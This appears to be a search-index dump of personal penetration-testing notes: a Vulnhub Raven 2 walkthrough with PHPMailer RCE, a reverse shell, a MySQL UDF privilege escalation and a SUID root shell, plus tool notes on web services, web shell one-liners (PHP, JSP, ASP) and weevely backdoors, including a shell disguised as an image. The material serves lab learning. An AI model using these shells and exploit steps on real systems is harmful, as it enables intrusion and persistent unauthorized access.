                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/","title":"Walkthrough: Raven 2, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#about-the-machine","title":"About the machine","text":"data Machine Raven 2 Platform Vulnhub url link Download https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download Mirror https://download.vulnhub.com/raven/Raven2.ova Size 765 MB Author William McCann Release date 9 November 2018 Description Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven? Difficulty Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

                            Raven 1 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.

                            After running

                            ip a\n
                            we know that the attacker's machine IP address is 192.168.56.102/24.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#identify-victims-ip","title":"Identify victim's IP","text":"

                            To discover the victim's machine IP, we run:

                            sudo netdiscover -i eth1 -r 192.168.56.102/24\n

                            These are the results:

                            Usually, victim's IP is the last one listed, in this case 192.168.56.104, BUT as this lab was performed in several days, victim's machine IP will switch eventually to 192.168.56.105.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

                            Now we can run a scanner to see which services are running on the victim's machine:

                            sudo nmap -p- -A 192.168.56.104\n

                            And the results:

                            Having a web server in port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan with dirb:

                            dirb http://192.168.56.104\n
                            By default, dirb is using /usr/share/dirb/wordlists/common.txt. The results are pretty straightforward:

                            There are two folders quite appealing:

                            • A wordpress installation running on the server.
                            • A vendor installation with a service such as PHPMailer installed.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#deeper-scan-with-specific-tool-for-wordpress-service-wpscan","title":"Deeper scan with specific tool for wordpress service: wpscan","text":"

                            First, let's start by running a much deeper scanner with wpscan. We'll be enumerating users,

                            wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

                            And the results show us some interesting findings:

                            Main findings:

                            • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authentication to post entries. It's also useful in wordpress for retrieving pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this lateri.
                            • WordPress readme found: http://raven.local/wordpress/readme.html
                            • Upload directory has listing enabled: http://raven.local/wordpress/wp-content/uploads/.
                            • WordPress version 4.8.7.
                            • WordPress theme in use: twentyseventeen.
                            • Enumerating Users: michael, steven.

                            Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation. As a matter of fact, by clicking on http://192.168.56.105/wp-admin/install.php, we end up on a webpage with the source code pointing to raven.local. We need to include a redirection in our /etc/hosts file. (This is better explained in the vulnhub raven 1 machine.

                            sudo nano /etc/hosts\n

                            At the end of the file we add the following line:

                            192.168.56.104  local.raven\n# CTRL-s  and CTRL-x\n

                            There was another open folder: http://raven.local/wordpress/wp-content/uploads/. Using the browser we can get to

                            And now we have flag3:

                            Let's see now the user enumeration. Yoy can go to the walkthrough of the Vulnhub Raven 1 machine to see how to manually brute force users in a wordpress installation.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

                            Having found anything, after testing input validations in the endpoints of the application,

                            I'm going to try to brute force login with steven, who is the user with id=2.

                            wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

                            And also with michael:

                            wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames michael -t 25\n

                            No valid password is found.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#browse-listable-folders-that-are-supposed-to-be-close","title":"Browse listable folders that are supposed to be close","text":"

                            Besides the wordpress installation, our dirb scan gave us another interesting folder: http://192.168.56.105/vendor. Browsing around you can find the service PHPMailer installed.

                            Two insteresting findings regarding the PHPMailer service:

                            One is the file PATH, with the the path to the service and other of the flags:

                            In plain text:

                            /var/www/html/vendor/\nflag1{a2c1f66d2b8051bd3a5874b5b6e43e21}\n

                            The second is the file VERSION, that reveals that the PHPMailer service has version 5.2.16, which is potentially vulnerable,.

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-the-service-phpmailer-5216","title":"Exploiting the service PHPMailer 5.2.16","text":"

                            After googling \"phpmailer 5.2.16 exploit\", we have these results:

                            • https://www.exploit-db.com/exploits/40974.

                            What is this vulnerability about? Quoting Legalhackers:

                            An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

                            When it comes to Raven 2 machine, we realize that we're using a contact form from:

                            We can use the exploit from https://www.exploit-db.com/exploits/40974.

                            Originally, this exploit is (highlighted the fields we're going to change):

                            And this is the anarconder.py saved with execution permissions in our attacker machine (hightlighted my changes to the original script):

                            We launch the script:

                            python3 anarconder.py\n

                            And open in listening mode port 4444 with netcat:

                            nc -lnvc 4444\n

                            Now, I will open in the browser http://192.168.56.105/zhell.php to get the reverse shell in my netcat conection.

                            And we can browse to /var/www and get flag2.txt

                            flag2.txt in plain text:

                            flag2{6a8ed560f0b5358ecf844108048eb337}\n

                            Also, a nice-thing-to-do on every wordpress installation is checking out for credentials in the config file (if existing). So by browsing to /var/www/html/wordpress, we can see:

                            And reading the file, we can see some credentials:

                            cat wp-config.php\n

                            So now we also have these credentials:

                            • user: root
                            • password: R@v3nSecurity

                            We can try to access ssh service running on port 22 with those credentials, without success. We can also try to escalate from the open shell, but we get the message that \"su root must be run from terminal\".

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#escalation-of-privileges","title":"Escalation of privileges","text":"

                            First, let's see who we are (id), to which groups we belong (id), the version of the running server (uname -a), and which commands we are allowed to run (sudo -l).

                            Also there are some nice tools that we could run in the victim machine if we have python installed. Let's make a comprobation:

                            which python\n
                            Result:

                            /usr/bin/python\n

                            Nice, let's proceed: There is a cool enumeration tool for linux called Linux Privilege Cheker, that we can download from the referenced github repo and serve it from our attacker machine:

                            cp linuxprivchecker.py /var/www/html\ncd /var/www/html\nservice apache2 start\n

                            And then, from the victim machine:

                            cd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\n

                            Now we can run it and see the results:

                            python /tmp/linuxprivchecker.py\n

                            Once you run it, you will get this enumeration of escalation exploits. Since potentially we have some root credentials for a service, we will try with the MYSQL vulnerability 4.X/5.0.

                            After reviewing the exploit http://www.exploit-db.com/exploits/1518, we copy-paste the exploit and save it as 1518.c in our apache server:

                            cd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n

                            Compiling this C code in the victim attack gives us error.

                            Then, we are going to compile in the attacker machine.

                            # To creates 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n

                            The file we are going to retrieve from the victim machine is 1518.so. So from /tmp in the victim machine:

                            cd /tmp\nwget http://192.168.56.102/1518.so\n

                            Now in the victim machine, we login into MSQL service:

                            mysql -u root -p\n\n# when asked about password, we enter R@v3nSecurity\n

                            We're in! Let's do some digging:

                            # List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n

                            Exploiting the vulnerability: we'll create a table in the database, with a column, and we will assing a value to that column that it's going to be our payload file with the extension .so.

                            create table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n

                            So far:

                            ![Mysql capture](img(raven2-19.png)

                            Now, we are going to load that file from the column to a different location, let's say /usr/lib/mysql/plugin/1518.so:

                            select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n

                            If we now execute:

                            select do_system('chmod u+s /usr/bin/find');\nexit\n

                            Now, if we check suid binaries, we can see \"find\" among them.

                            Now, if we create a file, such as \"tocado\" in the /tmp folder of the victim machine and we execute 'find file -exec code', every time that the command finds the file it will execute the following code as root.

                            Then, we can run:

                            touch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#getting-the-flag","title":"Getting the flag","text":"

                            We just need to go to the root folder:

                            cd /root\nls -la\ncat flag4.txt\n

                            flag4.txt in plain text:

                              ___                   ___ ___ \n | _ \\__ ___ _____ _ _ |_ _|_ _|\n |   / _` \\ V / -_) ' \\ | | | | \n |_|_\\__,_|\\_/\\___|_||_|___|___|\n\nflag4{df2bc5e951d91581467bb9a2a8ff4425}\n\nCONGRATULATIONS on successfully rooting RavenII\n\nI hope you enjoyed this second interation of the Raven VM\n\nHit me up on Twitter and let me know what you thought: \n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
                            ip a\nsudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.105\ndirb http://192.168.56.105\nwpscan --url http://192.168.56.105/wordpress --enumerate u --force --wp-content-dir wp-content\npython3 anarconder.py\nnc -lnvc 4444\n\ncat wp-config.php\ncd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\npython /tmp/linuxprivchecker.py\n\n\ncd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n\n# To creates 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n\nmysql -u root -p\n\n# List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n\ncreate table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n\nselect * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n\nselect do_system('chmod u+s /usr/bin/find');\nexit\n\ntouch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#tools","title":"Tools","text":"
                            • dirb.
                            • netdiscover.
                            • nmap.
                            • wpscan.
                            • mysql
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"w3af/","title":"w3af","text":"

                            w3af is a\u00a0Web Application Attack and Audit Framework.

                            ","tags":["pentesting","web pentesting"]},{"location":"w3af/#installation","title":"Installation","text":"

                            Download from: https://github.com/andresriancho/w3af.

                            W3af documentation.

                            ","tags":["pentesting","web pentesting"]},{"location":"wafw00f/","title":"WafW00f - A firewall scanner","text":"

                            WafW00f is a web application firewall (WAF) fingerprinting tool that sends requests and analyses responses to determine if a security solution is in place.

                            WAFW00F does the following:

                            • Sends a\u00a0normal\u00a0HTTP request and analyses the response; this identifies a number of WAF solutions.
                            • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
                            • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#installation","title":"Installation","text":"

                            We can install it with the following command:

                            sudo apt install wafw00f -y\n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#basic-usage","title":"Basic usage","text":"
                            wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
                            ","tags":["pentesting","web pentesting","enumeration"]},{"location":"walkthroughs/","title":"Index of walkthroughs","text":"","tags":["walkthrough"]},{"location":"walkthroughs/#well-this-is-a-mess","title":"Well, this is a mess","text":"

                            It feels like an eternity since I embarked on my first walkthroughs of the Overthewire game challenges. However, the reality is that this happened just one year ago (or maybe two). During those days, I was consumed by an intense obsession with documenting every single step I took. Allow me to relive and share a snippet of my explanation for progressing from level 31 to level 32 in Bandit so you can draw your own conclusions:

                            Click to keep reading why this is a mess
                            1. mkdir /tmp/amanda31\n2. cd /tmp/amanda31\n3. git clone ssh://bandit31-git@localhost/home/bandit31-git/repo\n4. cd repo\n\n# when listing repo, you can realize that there is a .gitignore file\n5. ls -la\n\n# Print the .gitignore file to see which changes are not being commited\n6. cat .gitignore\n\n# \"*.txt\" files are being excluded from being pushed\n7. cat README.md\n\n# README.md file will provide you with the instructions to pass the level: \"This time your task is to push a file to the remote repository.\n# Details:\n#    File name: key.txt\n#    Content: 'May I come in?'\n#    Branch: master  \"\n\n# Remove \"*.txt\" from .gitignore\"\n8. echo \"\" > .gitignore\n\n# Create a key.txt file\n9. echo \"May I come in?\" > ./.git/key.txt\n\n# Add these changes to the commit\n10. git add -A\n\n# Commit the changes in your repository. A line with the explanation of the changes may be required\n11. git commit\n\n# Push the changes to the server\n12. git push\n\n# In the results of the git push commands, the server will \n# provide the password for the next level.\n

                            Smile on my face. I even commented what \"git push\" or \"cat file.txt\" were executing! XDDDDDDDD

                            I also vividly remember spending A LOT of time doing this. But you know what? I don't care what my colleagues say. All that time was completely worthwhile because it helped me integrate that knowledge into my tired brain. Take, for instance, the walkthrough of vulnhub Goldeneye 1. It took me a while to format and prepare it for sharing (and I did it with the intention of sharing).

                            Now things have changed. I don't do that anymore. I've become selfish. My walkthroughs have transformed into a list of steps linked to tools, tags and concise explanations, solely for the purpose of helping me remember that machine. They are probably only useful to me (not suitable for LinkedIn hahaha).

                            Anyway, at some point, I needed to make this decision. More labs and self-centered documentation? Or more detailed walkthroughs and fewer labs (and consequently falling behind on my goals)? More labs, geee!

                            All of this is just to say that in this repository, you will find incredibly detailed walkthroughs (even with multiple ways of exploiting a machine) along with quick guides containing raw commands. All of them together and for no reason. Please, bear with me!

                            ","tags":["walkthrough"]},{"location":"walkthroughs/#updated-list-of-walkthroughs-writeups","title":"Updated list of walkthroughs - writeups","text":"
                            • Vulnhub GoldenEye 1
                            • Vulnhub Raven 1
                            • Vulnhub Raven 2
                            • HTB appointment
                            • HTB archetype
                            • HTB bank
                            • HTB base
                            • HTB crocodile
                            • HTB explosion
                            • HTB friendzone
                            • HTB funnel
                            • HTB included
                            • HTB ignition
                            • HTB lame
                            • HTB markup
                            • HTB metatwo
                            • HTB mongod
                            • HTB nibbles
                            • HTB nunchucks
                            • HTB omni
                            • HTB oopsie
                            • HTB pennyworth
                            • HTB photobomb
                            • HTB popcorn
                            • HTB redeemer
                            • HTB responder
                            • HTB sequel
                            • HTB support
                            • HTB tactics
                            • HTB trick
                            • HTB undetected
                            • HTB unified
                            • HTB usage
                            • HTB vaccine
                            ","tags":["walkthrough"]},{"location":"waybackurls/","title":"waybackurls","text":"

                            waybackurls inspects back URLs saved by Wayback Machine and look for specific keywords.

                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#installation","title":"Installation","text":"
                            go install github.com/tomnomnom/waybackurls@latest\n
                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#basic-usage","title":"Basic usage","text":"
                            waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
                            ","tags":["pentesting","reconnaissance","tools"]},{"location":"web-services/","title":"Pentesting web services","text":"","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-web-applications","title":"Web services vs. Web applications","text":"
                            • Interoperability: Web services promote interoperability by providing a standardized way for applications to communicate. They rely on open standards like HTTP, XML, SOAP, REST, and JSON to ensure compatibility.
                            • Platform-agnostic: Web services are not tied to a specific operating system or programming language. They can be developed in various technologies, making them versatile and accessible.
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-apis","title":"Web services vs. APIs","text":"

                            Web services and APIs (Application Programming Interfaces) are related concepts in web development, but they have distinct differences. Web services are a broader category of technologies used to enable machine-to-machine communication and data exchange over the internet. They encompass various protocols and data formats. APIs, on the other hand, are a set of rules and tools that allow developers to access the functionality or data of a service, application, or platform.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#implementation-of-web-services","title":"Implementation of web services","text":"

                            Web service implementations refer to the different ways in which web services can be created, deployed, and used. There are several methods and technologies available for implementing web services.

                            • SOAP (Simple Object Access Protocol): SOAP is a protocol for exchanging structured information in the implementation of web services. SOAP-based web services use XML as their message format and can be implemented using various programming languages.
                            • JSON-RPC and XML-RPC: JSON-RPC and XML-RPC are lightweight protocols for remote procedure calls (RPC) using JSON or XML, respectively. These are simpler alternatives to SOAP for implementing web services.
                            • REST (Representational State Transfer): REST is an architectural style for designing networked applications, and it uses HTTP as its communication protocol.
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#xml-rpc","title":"XML-RPC","text":"
                            • XML-RPC (Extensible Markup Language - Remote Procedure Call) created in 1998, is a protocol and a set of conventions for encoding and decoding data in XML format and using it for remote procedure calls (RPC).
                            • It is a simple and lightweight protocol for enabling communication between software applications running on different systems, often over a network like the internet.
                            • XML-RPC has been used as a precursor to more modern web service protocols like SOAP and REST.
                            • It works by sending HTTP requests that call a single method implemented on the remote system.
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#json-rpc","title":"JSON-RPC","text":"
                            • JSON-RPC (Remote Procedure Call) is a remote procedure call (RPC) protocol encoded in JSON (JavaScript Object Notation).
                            • Like XML-RPC, JSON-RPC enables communication between software components or systems running on different machines or platforms.
                            • JSON-RPC is known for its simplicity and ease of use and has become popular in web development and microservices architectures.
                            • JSON-RPC is very similar to XML-RPC, however, it is usually used because it provides much more human-readable messages and takes less data to for communication.
                            • JSON-RPC allows a client to invoke methods or functions on a remote server by sending a JSON object that specifies the method to call and its parameters.
                            • The message sent to invoke a method is a request with a single object serialized using JSON. It has three properties:
                              • method: name of the method to invoke
                              • params: an array of objects to pass as arguments
                              • id: request ID used to match the responses/requests
                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#soap","title":"SOAP","text":"

                            SOAP (Simple Object Access Protocol) is a protocol for exchanging structured information in the implementation of web services. It is a protocol that defines a set of rules and conventions for structuring messages, defining remote procedure calls (RPC), and handling communication between software components over a network, typically the internet.

                            SOAP is seen as the natural successor to XML-RPC and is known for its strong typing and extensive feature set, which includes security, reliability, and transaction support.

                            SOAP Web Services may also provide a Web Services Definition language (WSDL) declaration that specifies how they may be used or interacted with.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#rest-restful-apis","title":"REST (RESTful APIs)","text":"

                            REST, which stands for Representational State Transfer, is an architectural style for designing networked applications. It is not a protocol or technology itself but rather a set of principles and constraints that guide the design of web services and APIs (Application Programming Interfaces).

                            REST is widely used for building scalable, stateless, and easy-to-maintain web services/APIs that can be accessed over the internet. REST web services generally use JSON or XML, but any other message transport format like plain-text can be used.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-language-fundamentals","title":"WSDL Language Fundamentals","text":"

                            WSDL, which stands for Web Services Description Language, is an XML-based language used to describe the functionality and interface of a web service, typically, SOAP-based web services (Simple Object Access Protocol).

                            Versions: At the time of writing, WSDL can be distinguished in two main versions: 1.1 and 2.0. Although 2.0 is the current version, many web services still use WSDL 1.1.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-wsdl-document","title":"The WSDL Document","text":"

                            A WSDL document is typically created to describe a SOAP-based web service. It defines the service's operations, their input and output message structures, and how they are bound to the SOAP protocol.

                            First of all, it is important to know that WSDL documents have abstract and concrete definitions:

                            • Abstract: describes what the service does, such as the operation provided, the input, the output and the fault messages used by each operation
                            • Concrete: adds information about how the web service communicates and where the functionality is offered

                            The WSDL document effectively documents the API provided by the service. The WSDL document serves as a contract between the service provider and consumers. It specifies how clients should construct SOAP requests to interact with the service. This contract defines the operations, their input parameters, and expected responses.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-components","title":"WSDL components","text":"
                            • Types: The <types> section defines the data types used in the web service. It typically includes XML Schema Definitions (XSD) that specify the structure and constraints of input and output data.
                            • Message: The <message> element defines the data structures used in the messages exchanged between the client and the service. Messages can have multiple parts, each with a name and a type definition referencing the types defined in the <types> section.
                            • Port Type: The <portType> element describes the operations that the web service supports. Each operation corresponds to a method or function that a client can invoke. It specifies the input and output messages for each operation. The operation object defined within a port type, represents a specific action that a service can perform. It specifies the name of the operation, the input message structure, the output message structure, and, optionally, fault messages that can occur during the operation.
                            • Binding: The <binding> element specifies how the service operations are bound to a particular protocol, such as SOAP over HTTP. It defines details like the protocol, message encoding, and endpoint addresses.
                            • Service: The <service> element provides information about the service itself. It includes the service's name and its endpoint address, which is the URL where clients can access the service.

                            Instead of portType, WSDL v. 2.0 uses interface elements which define a set of operations representing an interaction between the client and the service. Each operation specifies the types of messages that the service can send or receive.

                            Unlike the old portType, interface elements do not point to messages anymore (it does not exist in v. 2.0). Instead, they point to the schema elements contained within the types element

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-service-security-testing","title":"Web Service Security Testing","text":"

                            Web service security testing is the process of evaluating the security of web services to identify vulnerabilities, weaknesses, and potential threats that could compromise the confidentiality, integrity, or availability of the service or its data.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#information-gathering-and-analysis","title":"Information Gathering and Analysis","text":"

                            1. Identify the SOAP web services that need to be tested.

                            2. Identify the WSDL file for the SOAP web service.

                            Once the SOAP service has been identified, a way to discover WSDL files is by appending ?wsdl,.wsdl, ?disco or wsdl.aspx to the end of the service URL:

                            3. With WSDL document identified we may gather information about the web service endpoints, operations, and data exchanged.

                            4. Understand the security requirements, authentication methods, and authorization mechanisms in place.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#authentication-and-authorization-testing","title":"Authentication and Authorization Testing","text":"

                            Invoke hidden methods

                            • Test the authentication mechanisms in place (e.g., username/password, tokens) to ensure they prevent unauthorized access.
                            • Verify that users are correctly authenticated and authorized to access specific operations and resources.
                            • Input Validation Testing:
                              • Test for input validation vulnerabilities, such as SQL injection, cross-site scripting (XSS), and XML-based attacks.

                            • Send malicious input data to the web service's input parameters to identify potential security weaknesses. For instance, command injection attacks:

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-soapaction-header","title":"The SOAPAction header","text":"

                            The SOAPAction header is a transport protocol header (either HTTP or JMS). It is transmitted with SOAP messages, and provides information about the intention of the web service request, to the service. The WSDL interface for a web service defines the SOAPAction header value used for each operation. Some web service implementations use the SOAPAction header to determine behavior.

                            ","tags":["pentesting","webservices","soap"]},{"location":"web-shells/","title":"Web shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

                            Preconfigured webshells in Kali linux

                            Go to /usr/share/webshells/

                            Other resources

                            See reverse shells

                            A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

                            A web shell script is typically a one-liner that is very short and can be memorized easily.

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#some-basic-web-shells","title":"Some basic web shells","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#php","title":"php","text":"
                            <?php system($_REQUEST[\"cmd\"]); ?>\n
                            • Pentesmonkey webshell.
                            • WhiteWinterWolf webshell.
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#jsp","title":"jsp","text":"
                            <% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>\n
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#asp","title":"asp","text":"
                            <% eval request(\"cmd\") %>\n
                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#how-to-exploit-a-web-shell","title":"How to exploit a web shell","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#file-upload-vs-remote-code-execution","title":"File upload vs Remote code execution","text":"

                            1. FILE UPLOAD: By abusing an upload feature. We would place this web shell script into the remote host's web directory to execute the script through the web browser.

                            2. REMOTE CODE EXECUTION: By writting our one-liner shell to the webroot to access it over the web. This would be if onle have remote command execution as a exploit vector. Here an example for bash:

                            echo '<?php system($_REQUEST[\"cmd\"]); ?>' > /var/www/html/shell.php\n

                            So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

                            Web Server Default Webroot Apache /var/www/html/ Nginx /usr/local/nginx/html/ IIS c:\\inetpub\\wwwroot\\ XAMPP C:\\xampp\\htdocs\\","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#accessing-the-web-shell","title":"Accessing the web shell","text":"

                            We can access to the web shell using the browser. Or Curl:

                            curl http://SERVER_IP:PORT/shell.php?cmd=id\n

                            A benefit of a web shell is that it would bypass any firewall restriction in place, as it will not open a new connection on a port but run on the web port on 80 or 443, or whatever port the web application is using.

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#tools","title":"Tools","text":"

                            About webshells.

                            Laudanum

                            nishang

                            ","tags":["pentesting","webshell","reverse-shells"]},{"location":"webdav-wsgidav/","title":"WsgiDAV: A generic and extendable WebDAV server","text":"

                            A generic and extendable WebDAV server written in Python and based on WSGI.

                            ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#installation","title":"Installation","text":"

                            Download from github repo: https://github.com/mar10/wsgidav.

                            sudo pip install wsgidav cheroot\n
                            ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#basis-usage","title":"Basis usage","text":"
                            sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
                            ","tags":["pentesting","windows","server"]},{"location":"weevely/","title":"weevely","text":"

                            Weevely is\u00a0a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

                            # Generate backdoor agent\nweevely generate <password> <path/to/save/your/phpBackdoorNamefile.php>\n#generate is for generating a backdoor\n# password to access the file\n\n# Then, you upload the file into the victim's server and use weevely to connect\n# Run terminal to the target\n weevely <URL> <password> [cmd]\n\n\n# Load session file\nweevely session <path>\n

                            Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

                            • Read the\u00a0Install\u00a0page to install weevely and its dependencies.
                            • Read the\u00a0Getting Started\u00a0page to generate an agent and connect to it.
                            • Browse the\u00a0Wiki\u00a0to read examples and use cases.
                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#example-from-a-lab","title":"Example from a lab","text":"

                            Generate a php webshell with Weevely and saving it an image:

                            weevely generate secretpassword example.png \n

                            Upload it to the application.

                            Make the connection with weevely:

                            weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

                            ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-commands","title":"weevely commands","text":"
                            # Cray for Help\nweevely> help\n

                            In an attack you will probably need:

                            # Read /etc/passwd with different techniques. Nice touch here is that weevely can bypass some restriction introduced in \"cat /etc/passwd\". For that it uses the attribute -vector\n:audit_etcpasswd            \n# -vector: posix_getpwuid, file, fread, file_get_contents, base64\n\n# Collect system information\n:system_info\n\n# Audit the file system for weak permissions.\n:audit_filesystem\n\n# Execute shell commands, BUT the cool part is that it bypasses the inability to run a bash command by tunnelling into a different language command. To see available languages, use the attribute -h\n:shell_sh -vector <VectorValue> <Command>\n# -vector With attribute vector you can choose to execute bash through php, python...\n\n# Download file from remote filesystem.\n:file_download -vector <VECTORValue> <rpath> <lpath>\n# -vector: file, fread, file_get_contents, base64\n# rpath: remote path of the file you want to download\n# lpath: location where you want to save it\n\n\n# Upload file to remote filesystem.\n:file_upload \n\n# Execute a reverse TCP shell.\n:backdoor_reversetcp -shell <SHELLType> -npo-autonnet -vector <VALUEofVector> <LHOST> <LPORT> \n:backdoor_reversetcp -h\n
